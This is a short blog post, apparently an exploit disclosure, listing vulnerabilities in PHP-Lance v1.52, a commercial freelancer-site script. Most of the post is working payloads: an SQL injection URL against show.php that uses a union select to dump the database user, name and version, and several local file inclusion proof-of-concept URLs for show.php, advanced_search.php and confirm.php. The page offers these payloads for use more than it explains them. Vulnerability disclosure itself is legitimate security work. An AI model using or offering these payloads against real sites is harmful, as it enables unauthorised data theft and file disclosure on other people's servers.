More Vulnerable File at PHP-Lance v1.52

[+] Vendor : BitmixSoft (http://www.bitmixsoft.com)
[+] Script Name : PHP-Lance v1.52
[+] Price : US $349.95
[+] Description : PHP-Lance, is a multilingual freelancer site with advanced customization option in the admin area. You can set all functions of the site such as: you can add as many languages as you want, change the site colors easily, set the transaction fee, manage sellers and buyers, etc.

[ SQL Injection ]

show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/*

Found by Cyb3r-1sT at November 27, 2008

[ Local File Inclusion ]

PoC's:
 
   - http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
   - http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
   - http:// 127.0.0.1 / [path] /advanced_search.php?in=[LFI]

Found by jetli007 at August 18, 2009

and now more Vulnerable File is From Don Tukulesto

- http://127.0.0.1/confirm.php?language=[LFI]
Leave a comment | Trackback
Dec 6th, 2009 | Posted in Exploitasi | Share | Tweet | - 0 -
No comments yet.

Leave a comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">
RSS for comments on this post